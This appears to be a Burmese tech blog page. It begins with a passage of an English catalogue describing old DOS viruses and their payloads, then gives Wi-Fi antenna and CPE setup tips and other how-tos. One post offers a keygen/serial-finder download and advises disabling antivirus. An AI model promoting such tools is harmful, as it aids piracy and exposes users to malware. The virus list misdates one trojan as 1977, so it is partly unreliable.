appeared in South Africa in 1987. At each execution of an
infected program the virus seeks out two other COM files on
the C drive and one COM file on the A drive and infects
them. The virus is extremely fast and the only indication
of infection occurring is the access light on the A drive
(if the current drive is C). The virus will only infect a
file once.

On every Friday 13 the virus deletes the host program if it
is executed on that day (similar to the Jerusalem).

19. Friday 13th-B
This virus is identical to the original except that it
infects every file in the current subdirectory. The only
way this virus can spread beyond the current subdirectory is
if an infected program ends up in the system PATH. Then
every COM file in the currently selected subdirectory will
get infected.

20. Friday 13th-C
This is the 13th-B except a message has been added that
displays - "We hope we haven't inconvenienced you" appears
whenever the virus activates.

21. JERUSALEM
(Also called Israeli; Friday the 13th; PLO)
This virus is a memory resident COM and EXE infector. It
was first discovered at the Hebrew University in Jerusalem
in the fall of 1987. It contains a flaw which makes it re-
infect EXE files over and over until the files become too
big to fit into memory. The virus re-directs interrupt 8
(among others) and one-half hour after an infected program
loads, the new timer interrupt introduces a delay which
slows down the processor by a factor of about 10. On every
Friday the 13, the virus deletes every program executed
during the day.

22. JERUSALEM-B
This virus is identical to the Jerusalem except it is able
to successfully identify pre-existing infections in EXE
files and will only infect them once.

23. JERUSALEM-C
(Also called the New Jerusalem)
This virus is identical to Jerusalem-B except that the timer
interrupt delay code has been bypassed. This virus is
virtually invisible until it activates.

24. BLACK HOLE
(Also called the Russian Virus)
This virus is the Jerusalem-C that has odd text and
additional code that is never referenced. A new interrupt
eight routine is added to the non referenced area and a
number of interrupt 21 calls which appear meaningless. The
additional text includes - "ANTIVIRUS". It appears that
this virus is a modified version of some previous variety of
the Jerusalem which we have not yet seen.

25. JERUSALEM-D
This is the Jerusalem-C that destroys both versions of the
FAT on any Friday the 13th after 1990. The code that
originally deleted executed programs has been overwritten
with the FAT destructive code.

26. JERUSALEM-E
This is identical to the D variety except the activation is
any Friday the 13th after 1992.

27. CENTURY VIRUS
(Also called the Oregon Virus)
This is similar to the Jerusalem-C except the activation
date is January 1, 2000. When the virus activates, it
erases both FATs on all connected drives and then begins
writing zeroes to every sector on every attached device. If
allowed to continue to completion, it displays the message -
" Welcome to the 21st Century".

28. CENTURY-B
This virus is similar to the original Century virus with the
following exception:

It waits for BACKUP.COM to be executed and then garbles all
program writes. After BACKUP terminates, the output
functions return to normal.

29. 1701
(Also called Cascade; Falling Tears)
This virus evolved from a trojan horse disguised as a
utility to automatically turn off the num-lock light at
system boot. The trojan horse caused the characters on the
screen to fall to the bottom of the screen in systems with
CGA monitors. In late 1977 this trojan horse was turned
into a memory resident COM virus. It gets it's name from
the size increase of infected COM files - 1701 bytes. The
virus has some unique qualities:
- It uses an encryption algorithm to avoid detection
and complicate any attempted analysis.
- It contains a sophisticated activation algorithm
that is based on randomizations, machine types,
monitor type, presence or absence of clock cards,
and time of year.
- It was designed to infect only IBM clones. True
IBM systems would be spared.
The virus has a bug that causes the machine selection
algorithm to fail. The virus activates on any machine with
a CGA or VGA monitor, in the months of September, October,
November or December in the year 1980 or 1988 (systems
without clock cards will often have a date set to 1980).

30. 1701-B
This virus is identical to the 1701 except that it activates
in the fall of any year.

31. 1704
(Also called Cascade; Falling Tears)
I would prefer to classify this virus as a variety of the
1701 but it has been universally referred to as a separate
virus, so I will go along with the crowd on this one. It is
functionally identical to the 1701 except that the IBM
selection bug has been repaired. The new virus is three
bytes longer. In every other respect it is the same.

32. 1704-B
This virus is identical to the 1704, except the cascade
display has been replaced with a system re-boot when the
virus activates. The activation uses the same interrupt 8
randomization algorithm, so the reboot will occur at a
random time interval after executing an infected program on
or after the activation date.

33. 1704-C
This virus is the same as the 1704-B, except the activation
date has been changed to occur in December of any year.

34. 1704-D
This virus is the same as the 1704, except the IBM selection
has been disabled (the virus infects true IBM PCs).

35. LEHIGH
This is a COMMAND.COM infector that first surfaced at Lehigh
University in late 1987. It is the widest known virus, the
most discussed and the most analyzed of all the viruses, so
I won't waste any more time on it.

36. SEARCH
(Also called Den Zuk; Venezuelan)
This is a boot sector infector that infects 360KB 5 1/4"
floppies. It infects through any access to the host
diskette. It can survive a warm reboot. It will infect
data (non-system) diskettes, which in turn can pass on the
infection if an accidental attempt to boot from the data
disk occurs. It has a bug which causes it incorrectly
attempt to infect 3.5" diskettes. This will overwrite the
diskette's FAT and cause a read (or write) failure. It
cannot infect a hard disk, and will not attempt to do so.
If an infected system is rebooted from the hard disk, the
virus will de-activate. This is not the case with rebooting
from a clean floppy - which will become infected.

The virus causes CGA, EGA and VGA screens to display a
purple "DEN ZUK" graphic to appear after a --
. It causes no damage.

37. SEARCH-HD
This virus is identical to the Search Virus, except it's
able to infect hard disks.

38. SEARCH-B
This virus is identical to the Search virus, but
unsuccessful modifications have been made to fix the 3.5"
diskette problem. The 3.5" infection still fails, plus
unsuccessful attempts to infect the hard disk will occur
which result in system failure in some systems.

39. SYS VIRUS
This virus is really a modification of the Search-HD virus.
The display code has been replaced (no display occurs on
reboot) by code that disables the SYS program. The SYS
program itself is not modified, but any attempt to execute
SYS will result in the program not being loaded. Instead,
multiple reads to the source and target drives will occur
(to simulate the SYS activity). The normal SYS message
output is displayed by the virus at the appropriate time.
This virus will successfully avoid being removed by SYS.
The virus does no damage.

40. SYS-B
This is similar to the SYS virus, but it performs a hard
disk format on any Friday 13th after 1990. This virus, and
its precursor virus both still contain the 3.5" bug, so that
they are easily detected on systems using 3.5" drives. They
are difficult to detect on other systems.

41. SYS-C
Similar to the SYS virus but performs random reboots
beginning 2 hours after power-on or initial boot.

42. 648 VIRUS
(Also called the Austrian Virus)
This is a COM infector that increases the size of the
infected file by 648 bytes. It was first reported in London
in the fall of 1988. It is not a memory resident virus. It
infects the next uninfected COM file in the current
directory (similar to the original Friday 13th). It does no
overt damage.

43. 648-B
This is similar to the 648, but it causes infrequent errors
in the infected COM file so that the file will not execute.
Approximately one file in ten will be corrupted.

44. STONED
(Also called New Zealand Virus)
This is a boot sector infector that infects 360 KB 5 1/4"
floppies. It was first reported in Wellington, New Zealand
in early 1988). It displays - "Your computer is now stoned.

Legalize Marijuana" every 8th bootup. No overt damage.
Unable to infect hard disk.

45. STONED-B
Variation of Stoned. Has been changed to be able to infect
hard disks. The hard disk is infected as soon as an
infected floppy is booted. No intentional damage done,
except systems with RLL controllers will frequently hang.

46. STONED-C
This is the Stoned-B virus that no longer displays the
"Stoned" message. This virus is difficult to detect.

47. VERA CRUZ
(Also Called Bouncing Ball; Italian Virus)
This is a boot sector virus that was first reported in March
1988. It is a floppy-only infector.

When this virus activates (randomly) a bouncing dot appears
on the screen and can only be removed through reboot. No
other damage is done.

48. VERA CRUZ-B
This is a variation of the Vera Cruz that is able to infect
Hard disks.

Ref :http://myanmar-hacking-team.wetpaint.com/page/Computer+Virus

Friday, May 11

Home Articles Categories About Wi-Fi လႊင့္နည္းမ်ား



အိမ္တြင္း၊ရံုးတြင္းအတြက္ Wi-Fi လႊင့္ဖို႔ဆိုရင္ေတာ့ Wireless Router (သို႔မဟုတ္) Access Point ကို အသံုးျပဳၿပီး လႊင့္ႏိုင္ပါတယ္။ Wi-Fi ကို မိုင္နဲ႔ခ်ီၿပီး လႊင့္ခ်င္တယ္ဆိုရင္ေတာ့ Router မွာတဲ့ Antenna ေလာက္နဲ႔ မရေတာ့ဘူး။ CPE ေတြ Antenna အႀကီးစားေတြ လိုအပ္ပါလိမ့္မယ္။ အခုေဆာင္းပါးမွာေတာ့ Wi-Fi လႊင့္နည္း အေသးစိတ္ ေရးသားေဖာ္ျပသြားပါ့မယ္။

Wi-Fi မလႊင့္ခင္ အရင္ဆံုးေတာ့ Wireless နည္းပညာအေၾကာင္းေလးေတြ အနည္းငယ္ သိမွ ျဖစ္ပါလိမ့္မယ္။ ကိုယ္က Wi-Fi ကို ခပ္ေ၀းေ၀းလႊင့္ခ်င္တယ္ ဆိုပါစို႔။ အရုိးရွင္းဆံုး ေတြးၾကည့္ရေအာင္ပါ။ Wireless Router ေတြမွာ ပါ၀င္တဲ့ Antenna ေတြဟာ ေပ ၅၀၀ ေလာက္ထိပဲ ရႏိုင္တာမို႔ ပိုၿပီး ေ၀းေ၀းေရာက္ခ်င္ရင္ Antenna အႀကီးစားတစ္ခု ၀ယ္ၿပီး Wireless Router နဲ႔ ဆက္သြယ္ရပါလိမ့္မယ္။ အဲဒီ Antenna ၀ယ္တဲ့အခါမွာ Omini ေတြ Directional ေတြ dBi ဆိုတဲ့ နည္းပညာစကားလံုးေတြကို မလြဲမေသြ ရင္ဆိုင္ရပါလိမ့္မယ္။ ဒါ့အျပင္ Antenna မွာ Outdoor Antenna နဲ႔ Indoor Antenna ဆိုၿပီး ကြဲျပားပါေသးတယ္။

ေလာေလာဆယ္ လူသံုးမ်ားေနတဲ့ TP-Link Outdoor Antenna ANT-2421D ကို ၾကည့္ၾကည့္ရေအာင္ပါ။ ေအာက္မွာ ေဖာ္ျပထားတဲ့ ပံုဟာ ANT-2421D ျဖစ္ပါတယ္။

ပံုၾကည့္ရင္ေတာ့ လက္တစ္ေတာင္ေလာက္ပဲ ရွိမယ္လို႔ ထင္စရာပါ။ ဒါေပမဲ့ လူတစ္ရပ္စာနီးပါး ရွည္ပါတယ္။ ဒီ Antenna ကို Wireless Router နဲ႔ ဆက္သြယ္လိုက္တာနဲ႔ ကိုယ့္ရဲ႕ Wi-Fi ဧရိယာက ခပ္ေ၀းေ၀းထိကုိ ေရာက္ပါလိမ့္မယ္။

သူ႔ရဲ႕ Specification ကေတာ့ ေအာက္ပါအတိုင္းပါ။

Specification မွာ အဓိကထားၿပီး ၾကည့္ရမွာက Gain ပါ။ ဒီ Antenna ဆိုရင္ Gain က 15 dBi ထိ ရပါတယ္။ dBi ဆိုတာက decibel isotropic ရဲ႕ အတိုေကာက္ျဖစ္ပါတယ္။ decibel ဆိုတာက အသံရဲ႕အတိုးအက်ယ္ကို တိုင္းတာတဲ့ ယူနစ္တစ္ခုဆိုလည္း ဟုတ္ပါတယ္။ dBi ယူနစ္ဟာ Ominidirectional Antenna ေတြအတြက္ တိုင္းတာတဲ့ ယူနစ္ ျဖစ္ပါတယ္။ dBi တန္ဖိုးမ်ားေလေလ လိႈင္းမ်ားကို ဖမ္းႏိုင္၊ပို႔ႏိုင္တဲ့ ခြင္က်ဥ္းေလေလ ျဖစ္ပါတယ္။ ဒါေၾကာင့္မို႔ အရပ္ရွစ္မ်က္ႏွာအႏွံ႔ ၀ိုင္ဖိုင္ကြန္ယက္ ျဖန္႔ခ်င္ရင္ dBi တန္ဖိုး နည္းတဲ့ Antenna ေတြကို သံုးစြဲသင့္ၿပီး လားရာတစ္ဖက္တည္းကို အဓိက ဦးတည္ခ်င္ရင္ေတာ့ dBi တန္ဖိုးမ်ားတဲ့ Antenna ကို သံုးစြဲသင့္ပါတယ္။

dBi တန္ဖိုးအနည္းအမ်ားဟာ အကြာအေ၀းနဲ႔ တိုက္ရိုက္သက္ဆိုင္မႈ မရွိပါဘူး။ (dBi တန္ဖိုးမ်ားရင္ အေ၀းႀကီးေရာက္ေအာင္ လႊင့္ႏိုင္တယ္လို႔ မယူဆမိပါေစနဲ႔) ဖမ္းယူႏိုင္တဲ့ဧရိယာကိုေတာ့ Beamwidth ကို ၾကည့္ၿပီး ဆံုးျဖတ္ႏိုင္ပါတယ္။ ဒီ Antenna မွာ Beamwidth က horizontal ဆိုရင္ ၃၆၀ဒီဂရီ ရရွိၿပီး vertical က ၉ ဒီဂရီပဲ ရပါတယ္။ ဆိုလိုတာက Antenna နဲ႔ horizonal အေနအထားအတိုင္း ဖမ္းမယ္ဆိုရင္ ၃၆၀ ဒီဂရီရတာမို႔ အေရွ႕က ဖမ္းဖမ္း၊ အေနာက္က ဖမ္းဖမ္း မိမွာပါ။ ဒါေပမဲ့ vertical အေနအထားနဲ႔ ဖမ္းမယ္ဆိုရင္ေတာ့ 9 ဒီဂရီအတြင္းမွာပဲ ရရွိႏိုင္ပါလိမ့္မယ္။

ဒါေၾကာင့္လည္း ဒီ Antenna ကို Omini Antenna ရယ္လို႔ အလြယ္ေခၚၾကတာပါ။ ၃၆၀ ဒီဂရီ ဖမ္းႏိုင္၊လႊတ္ႏိုင္တယ္ေပါ့ေလ။

Wireless Router ေတြမွာ External Antenna နဲ႔ဆက္သြယ္ဖုိ႔ Connector ပါဖုိ႔ေတာ့ လိုပါလိမ့္မယ္။ Antenna က ထြက္လာမယ့္ Cable မွာတပ္ဆင္ထားတဲ့ Connector က RP-SMA အမ်ိဳးအစား ျဖစ္ပါတယ္။ အဲဒီ RP-SMA က Wireless Router သို႔မဟုတ္ Access Point ရဲ႕ Connector ကို တိုက္ရိုက္ဆက္သြယ္လို႔ မရပါဘူး။ Wireless Router သို႔မဟုတ္ Access Point ရဲ႕ Connector ကို Pigtail Cable နဲ႔ အရင္ဆက္သြယ္ရပါမယ္။ ၿပီးေတာ့မွ အဲဒီ Pigtail Cable နဲ႔ Antenna ရဲ႕ Cable နဲ႔ ဆက္သြယ္ရပါလိမ့္မယ္။ ပံုကိုၾကည့္ပါ။

အထက္ပါပံုစံအတိုင္း ဆက္သြယ္ၿပီးရင္ Access Point သို႔မဟုတ္ Wireless Router ရဲ႕ Setting ကို ျပင္ဆင္ရပါလိမ့္မယ္။ သေဘာကေတာ့ အခုအခ်ိန္မွာ External Antenna နဲ႔ ဆက္သြယ္လိုက္ၿပီ ျဖစ္တဲ့အတြက္ Default Antenna ကို မသံုးစြဲေတာ့ဘဲ External Antenna နဲ႔ပဲ အလုပ္လုပ္ပါလို႔ ေျပာရမွာျဖစ္ပါတယ္။

အဲဒီအတြက္ Browser တစ္ခုခုကို ဖြင့္ၿပီး Wireless Router သို႔မဟုတ္ Access Point ရဲ႕ IP ကို ရိုက္ထည့္ၿပီး Login ၀င္ပါ။ ၿပီးရင္ ျပင္ဆင္ပါ။ (Wireless အုပ္စုထဲက Antenna ကို ေတြ႕ေအာင္ရွာၿပီး External လို႔ေျပာင္းၿပီး Save ႏွိပ္ပါ။

External Antenna နဲ႔လည္း Join ၿပီးသြားရင္ ကိုယ့္ Wi-Fi က ဘယ္ေလာက္အကြာအေ၀းထိ ေရာက္ႏိုင္သလည္းဆိုတာ သိခ်င္မွာ အမွန္ပါပဲ။ Wi-Fi ကို အေ၀းႀကီးေန မိဖို႔ဆိုတာ လႊင့္တဲ့ဘက္ကေနမကဘဲ ဖမ္းယူတဲ့ဘက္မွာပါ အေရးႀကီးပါတယ္။ Laptop မွာပါတဲ့ Wi-Fi Adapter ေလးနဲ႔ ဖမ္းမယ္ဆိုရင္ေတာ့ လႊင့္တဲ့ဘက္က ဘယ္လိုပဲ ပစၥည္းအေကာင္းစားေတြနဲ႔ လႊင့္ပါေစ အေ၀းႀကီးကေန ဘယ္လိုမွ မဖမ္းယူႏိုင္ပါဘူး။

ဒါဟာ လႊင့္တဲ့ဘက္ကေၾကာင့္ မဟုတ္ဘဲ Laptop မွာပါတဲ့ Wi-Fi Adapter ေၾကာင့္သာ ျဖစ္ပါတယ္။ ဒါေၾကာင့္မို႔ ဖမ္းယူတဲ့ဘက္မွာ Gain မ်ားတဲ့ CPE သို႔မဟုတ္ USB Wireless Adapter စတာေတြ တစ္ခုခုသံုးၿပီး ဖမ္းယူမွ အေ၀းႀကီးကေန ဖမ္းယူႏိုင္ပါလိမ့္မယ္။ TP-Link Products ေတြကို အႀကိဳက္ေတြ႕သူမ်ားအတြက္ေတာ့ သူတို႔ရဲ႕ Offical Website ထဲမွာ Distance Calculator ဆိုတဲ့ Web Application တစ္ခု ေပးထားပါတယ္။ အဲဒါေလးအသံုးျပဳၿပီး ကိုယ့္ဘက္က ဘယ္ Antenna နဲ႔ လႊင့္ရင္ သူ႔ဘက္က ဘယ္လို Antenna နဲ႔ဖမ္းရင္ ဘယ္အကြာအေ၀းအထိ ရႏိုင္တယ္ဆိုတာေတြကို တြက္ခ်က္ႏိုင္ပါလိမ့္မယ္။

http://www.tp-link.com/support/wireless_calculator/index.asp

ပံုမွာ အဲဒီ Wireless Calculator ကို ျပထားပါတယ္။

လႊင့္တဲ့ဘက္နဲ႔ ဖမ္းယူတဲ့ဘက္မွာ အသံုးျပဳတဲ့ device အမ်ိဳးအစား (Router သို႔မဟုတ္ Access Point) အသံုးျပဳတဲ့ Cable အသံုးျပဳတဲ့ Antenna ေတြကို ေရြးခ်ယ္ေပးရံုနဲ႔ အကြာအေ၀း ဘယ္ေလာက္အထိ ရႏိုင္တယ္ဆိုတာကိုကို ျပသေပးပါလိမ့္မယ္။ နမူနာအေနနဲ႔ ဖမ္းတဲ့ဘက္ေရာ လႊင့္တဲ့ဘက္မွာပါ TL-WR543G Wireless Router နဲ႔ TL-ANT2412D Antenna ကို အသံုးျပဳထားပါတယ္။ Calculate လုပ္တဲ့အခါမွာ ရလာတဲ့ Result ေတြကေတာ့ ေအာက္ပါအတိုင္းပါပဲ။

Result ေတြကို ၾကည့္လိုက္ရင္ Wireless ကို 11g နဲ႔ လႊင့္ရင္ အမ်ားဆံုး 0.3 mile ထိ ရတာကို ေတြ႕ရမွာပါ။ 11b နဲ႔ လႊင့္ရင္ေတာ့ 0.5 mile ထိ ရပါလိမ့္မယ္။ (သီအိုရီအရသာ ျဖစ္ပါတယ္) ဒါေၾကာင့္မို႔ b နဲ႔လႊင့္တာဟာ ေ၀းေ၀းပိုေရာက္ေပမဲ့ Speed က်ေတာ့ 1 Mbps ပဲ ရႏိုင္တာကို သတိျပဳရပါလိမ့္မယ္။ အထက္ပါ Result ဟာ Transmit ေရာ Receive ဘက္မွာ WR543G ပဲ သံုးစြဲထားတာမို႔ ဒီေလာက္ အကြာအေ၀းထိပဲ ရတာပါ။

ၿပီးခဲ့တဲ့ အပိုင္းေတြတုန္းက Router နဲ႔ Antenna နဲ႔ တြဲၿပီး လႊင့္တဲ့အေၾကာင္းကို ေရးသားခဲ့ပါတယ္။ တကယ္တမ္း ျမန္မာျပည္တြင္းမွာ အသံုးခ်ေနတဲ့ပံုစံကေတာ့ အဲဒီပံုစံမဟုတ္ပါဘူး။ CPE ဗူးေတြကို အသံုးခ်ၿပီး လႊင့္ေနၾကတာပါ။ အခုေဆာင္းပါးမွာေတာ့ CPE ဗူးေတြနဲ႔ Wi-Fi လႊင့္နည္းေတြကို ေဖာ္ျပေပးသြားပါ့မယ္။

CPE ဆိုတာ Customer Provision Equipment ရဲ႕ အတိုေကာက္ပါ။ ေပၚလာတာ ႏွစ္ပိုင္းေလာက္ပဲ ရွိပါေသးတယ္။ သူက Wireless Signal ေတြကို ဖမ္းႏိုင္၊လႊင့္ႏိုင္ၿပီး Outdoor အေနနဲ႔ အသံုးျပဳရပါတယ္။ Antenna ေတြနဲ႔ မတူတာက သူဟာ dbi မ်ားၿပီး ေ၀းေ၀းေရာက္ပါတယ္။ အဓိကကေတာ့ Point to Point ထိုးဖို႔ အတြက္ သံုးပါတယ္။ လႊင့္တဲ့ဘက္မွာ CPE တစ္ဗူးကို တိုင္နဲ႔ေထာင္၊ ဖမ္းတဲ့ဘက္မွာလည္း CPE ဗူးကို တိုင္နဲ႔ ေထာင္ၿပီးဖမ္းရင္ အနည္းဆံုး ေလးမိုင္အကြာအေ၀းေလာက္ထိ ရပါတယ္။ ပံုမွာ CPE ကို ျပသထားပါတယ္။

Antenna တိုင္ေတြနဲ႔ မတူတာက Antenna တိုင္ေတြဟာ အရပ္ရွစ္မ်က္ႏွာကို Wi-Fi Signal လႊင့္ႏိုင္၊ ဖမ္းႏိုင္ ပါတယ္။ CPE ေတြကေတာ့ လားရာတစ္ဖက္တည္း လႊတ္ႏိုင္၊ ဖမ္းႏိုင္ဖို႔အတြက္ ျဖစ္ပါတယ္။ ဒါေၾကာင့္မို႔ CPE ေတြကို Directional ဆိုၿပီး သံုးစြဲေခၚေ၀ၚၾကတာပါ။ အင္တာနက္ဆိုင္တစ္ဆိုင္အေနနဲ႔ အရပ္ေလးမ်က္ႏွာကို Wi-Fi လႊင့္ခ်င္တယ္၊ အေ၀းႀကီးလည္း ေရာက္ခ်င္တယ္ဆိုရင္ေတာ့ CPE ဗူး ေလးဗူး တပ္ဆင္ရပါလိမ့္မယ္။ CPE ကို တပ္ဆင္နည္းကလည္း လြယ္ကူပါတယ္။ ပထမဆံုး Router နဲ႔ CPE ကို CAT 6 ႀကိဳးနဲ႔ ဆက္သြယ္ရပါလိမ့္မယ္။ CPE ၀ယ္တဲ့အခါ POE(Power Over Ethernet) Adapter ပါ၀င္ပါလိမ့္မယ္။ Router က ႀကိဳးကို အဲဒီ POE Adapter ရဲ႕ LAN အေပါက္ဆီ ဆက္သြယ္ရပါမယ္။ POE Adaptor မွာ ေနာက္ထပ္ပါ၀င္တဲ့ POE အေပါက္နဲ႔ CPE ကိုေတာ့ CAT 6 ႀကိဳးကို အသံုးျပဳၿပီး ဆက္သြယ္ရပါလိမ့္မယ္။ ပံုကိုၾကည့္ပါ။

ပံုပါအတိုင္း ဆက္သြယ္ၿပီးသြားရင္ ဆက္ၿပီးလုပ္ေဆာင္ရမယ့္ အပိုင္းက Setting ခ်ိန္တဲ့အပိုင္းျဖစ္ပါတယ္။ အဓိက Main Point ကေတာ့ လႊင့္တဲ့ဘက္က CPE ေတြဟာ AP Mode နဲ႔ လႊင့္ရမွာပါ။ ဖမ္းတဲ့ဘက္က CPE ေတြကေတာ့ AP Client Router Mode နဲ႔ ဖမ္းယူရမွာျဖစ္ပါတယ္။

Setting ျပင္နည္းကေတာ့ ပထမဆံုး ကြန္ပ်ဴတာရဲ႕ IP ကို 192.168.1.x ဆိုၿပီး x ေနရာမွာ ႀကိဳက္တဲ့နံပါတ္ ထည့္ပါ။ Subnet ကေတာ့ ထံုးစံအတိုင္း 255.255.255.0 ပါ။ ၿပီးရင္ CPE ကို ကြန္ပ်ဴတာနဲ႔ဆက္သြယ္ပါ။ Browser တစ္ခုခုကို ဖြင့္ပါ။ CPE ရဲ႕ Default IP ျဖစ္တဲ့ 192.168.1.254 ကို ရိုက္ထည့္ပါ။ username နဲ႔ password ေတာင္းရင္ admin admin လို႔ပဲ ထည့္ေပးပါ။

CPE Configuration ထဲ ေရာက္သြားရင္ ဘယ္ဘက္က Wireless mode ကို ေရြးခ်ယ္ပါ။ ၿပီးရင္ ညာဘက္က AP mode ကို ေရြးေပးပါ။ ဒါဆိုရပါၿပီ။ ဖမ္းတဲ့ဘက္မွာေတာ့ ဒီပံုစံအတိုင္းပဲ AP Client Router mode ကို ေရြးခ်ယ္ပါ။
Ref: IT Man

Blogger မွာမွာ MixPod player ထည့္သြင္းနည္း



ဟုတ္ကဲ့ အခုက်ေနာ္ေဆြးေႏြးခ်င္တာကေတာ့ MIXPOD player ေလးကိုဘေလာ့မွာထည့္သြင္းနည္းပါ
မသံုးတတ္သူေတြအတြက္ ရည္ရြယ္ပါတယ္
ပထမဆံုးအေနနဲ႕ http://www.mixpod.com ကို၀င္ပါ
ေနာက္ ပံဳပါအတို္င္း Register လုပ္ပါ ဒါေတာ့လူတိုင္းရမွာပါ

ၿပီးရင္ Login ၀င္ပါ
ၿပီးရင္ Create Play List ကုိ Click ပါ

ၿပီးလွ်င္ Add Music မွ ေနၿပီး Add Url သို႕ Popular Soung ၏ Search မွေနၿပီး သီခ်ငး္ထည့္သြင္းႏိုင္ပါသည္

ၿပီးလွ်င္ Customize မွ ေနၿပီး Skin Colour , Setting ( Autoplay or menual play)

ၿပီးလွ်င္ Save Playlist မွ စိတ္ၾကိဳက္ထပ္ကလိပါ
ၿပီးလွ်င္ Get Code မွ ကုဒ္ယူပါ

ၿပီးလွ်င္ Blogger ထဲမွ Desing >> Add a Gadget >> HTML/JavaScript တြင္ ကူးယူထားေသာကုဒ္ေလးအားထည့္လိုက္ပါ
သင့္ Blog တြင္ MIX POD player ေလး ရၿပီေပါ့

Tuesday, May 8

COMPUTER ကိုဘယ္သူသံုးေသးလဲ

နည္းေလးကေတာ့လြယ္လြယ္ေလးပါ။မသိေသးတဲ့လူေတြအတြက္ပါ။
ကုိယ္မသုံးတဲ႕ အခ်ိန္ မိမိကြန္ပ်ဴတာကို ဘယ္သူလာသုံးသြားလဲ ဆုိတာ သိရေအာင္ ၾကည္႕တဲ႕နည္းျဖစ္ပါတယ္။ ဒီေနရာမွာ Run ကေန Recent လုိ႕ ရုိက္ျပီ း ဘာေတြ ဖြင္႕လဲဆုိတာ ၾကည္႕ရင္သိမွာေပါ႔လုိ႕ေျပာမယ္ထင္တယ္။ ဘာေတြ ဖြင္႕သြားလဲဆုိတာ ၾကည္႕လုိ႕ရေပမဲ႕ ဘယ္အခ်ိန္မွာ ဖြင္႕ ဘယ္အခ်ိန္မွာ သုံးလဲဆုိတာ မသိႏုိင္ပါဘူး။ Recent ကုိ Delete ေပးသြားရင္ေကာ ဘယ္လုိ႕မွ သူဖြင္႕မဖြင္႕ မသိႏုိင္ေတာ့ဘူးမလား။ အင္တာနက္ ရတဲ႕စက္မ်ားကေတာ႕ Firefox တုိ႕ Internet Explorer တုိ႕မွာ History မွာ ၀င္ၾကည္႕မွာေပါ႔လုိ႕ ေျပာလုိ႕ရပါတယ္။ ဖ်က္သြားရင္ေကာ ဘယ္လုိ အစ ရွာမလဲ။ အင္တာနက္မရွိရင္ေကာ ဘယ္လုိ ေျခရာခံမလဲ။ ဒါေၾကာင္႕ မိမိစက္ကုိ ဘယ္ခ်ိန္မွာဖြင္႕တယ္။ ဘယ္အခ်ိန္မွာ ပိတ္သြားတယ္ဆုိတာ သိရေအာင္ ေအာက္ပါအတုိင္း အလြယ္သြားလုိက္ပါဗ်ာ.။

1.Start >> Run မွာ eventvwr.msc ရုိက္ျပီး Enter ေခါက္လုိက္ပါ.။
2.Windows log မွာ Application, Security, ႏွင္႕ System မွာ ၾကည္႕ႏုိင္ပါတယ္။
အဲဒီမွာသူတို ့သံုးခဲ့တဲ့ ေန႕ရက္ အခ်ိန္နာရီေတြနဲ ့ဘာေတြကုိ ဘယ္လိုသံုးခဲ့လည္းဆိုတာေတြ႕ပါလိမ့္မယ္္
Ref: ေၾကးစားေလး

Friday, April 20

Keygen ေတြ Serial key ေတြကို ရွာေဖြေပးတဲ့ software Craagle.4.0.FINAL

ဒီတစ္ခါေတာ့ Keygen ေတြ Serial key ေတြကို ရွာေဖြေပးတဲ့ software ေလးကို တင္ေပးလိုက္ပါ သည္။ No proxy သံုးတဲ့သူေတြကေတာ့ ရွာခ်င္တဲ့ serial key ေတြ ကို search box မွာ ရိုက္ထည့္ ၿပီး ရွာရုံပဲျဖစ္ပါတယ္။ Proxy သံုးတဲ့သူေတြကေတာ့ ေအာက္မွာပံုနဲ႔ ရွင္းျပထားပါတယ္။ Box ေလးမွာ Right Click ႏွိပ္ၿပီး Option ထဲမွာ ျပင္ဆင္ရုံပဲျဖစ္ပါသည္။ အေသးစိတ္ကို ၾကည့္ရႈၾကပါ။ ေအာက္မွာေပးထားတဲ့ Download Link ေလးမွ Download လုပ္ႏိုင္ပါသည္။
keygen သံုးတဲ့ software ၿဖစ္လို rar ၿဖည့္ၿပီးတာနဲ antivirus ပိတ္ထားေပးပါ။











mediafire download link

zippyshare download link

min.us download link
Ref: onekokoaung.

Tuesday, April 10

ကိုကို/မမ ဟက္ေယာင္ကားမ်ားအတြက္



အားလံုးေသာ ဟက္ကင္း၀ါသနာရွင္မ်ား ပညာရွင္မ်ား မဂၤလာပါလို႕ ႏႈတ္ဆက္ပါရေစ။
က်ေနာ္အခု ေဆြးေႏြးခ်င္တာကေတာ့ ဟက္ေယာင္ေၾကာင္ လုပ္ခ်င္တဲ့သူေတြအတြက္ရည္ရြယ္ပါတယ္
က်ေနာ္လဲအဲအထဲမွာ ပါေကာင္းပါႏိုင္ပါတယ္ (ရွက္လို႕သာေျပာတာ ဂယ္လညး္ပါပါတယ္ဟီး)
အခု ဘယ္ဖိုရမ္ကိုပဲၾကည့္ၾကည့္ခင္ဗ် ဟက္ကင္းဆိုတာနဲ႕ စိတ္၀င္စားၾကတာပါပဲ
ျမန္မာႏိုင္ငံမွာသာမဟုတ္ ႏိုင္ငံတကာမွာေကာပဲခင္ဗ်. ခုက်ေနာ္တုိ႕ဆီမွာ ေခတ္စားေနတာက (mmitd မွာေကာပဲ) Wi Fi hacking ကို
အရမ္းေခတ္စားေနတယ္ အရင္တုန္းက လည္း Google Talk အေကာင့္ကို ဟက္ခ်င္လို႕ပါဆိုတဲ့ စကားေတြ ပို႕ေတြ Comment ေတြ သိန္း သန္း မက .
ေတြ႕ခဲ့ရပါတယ္ အဲ ေအာင္ျမင္ၾကပါသလား ႏိုး မေအာင္ျမင္ပါဘူး ေအာင္ျမင္တယ္ဆိုတာလည္း အေၾကာင္းသံုးခ်က္ပါ
တစ္ခုက အေကာင့္ပိုင္ရွင္စက္ကတဆင့္ျဖစ္ျဖစ္ SQLT ကိုသိလို႕ျဖစ္ျဖစ္ တျခားေသာ Clone မ်ားျဖစ္ျဖစ္
ေနာက္တစ္ခုက ေတာ့ အဆင့္မရွိဆံုးျဖစ္တဲ့ ေနာက္မွ ခိုးၾကည့္ျခင္းေၾကာင့္သာ ျဖစ္ပါတယ္ ။
က်န္တဲ့တစ္ခုက ေတာ့ လူအထင္ၾကီးေအာင္လို႕ ဟက္ႏိုင္ေယာင္ေဆာင္ၿပီး ရြီးေနတဲ့အခ်က္ပါ
အဲလို Google Account ကို ဟက္တာက တကယ္ေတာ့ က်ေနာ္ေျပာသလိုေလာက္ပဲရတာပါ
မလြယ္ပါဘူး ေတာ္႐ံုလူဟက္ႏိုင္ဖို႕က (မလြယ္တာေနာ္ မရတာမဟုတ္ဘူး) Google Sever ကိုေတာင္ဟက္ႏိုင္ရင္
ဆရာေတာ္ေတာ္က်လို႕ပဲ
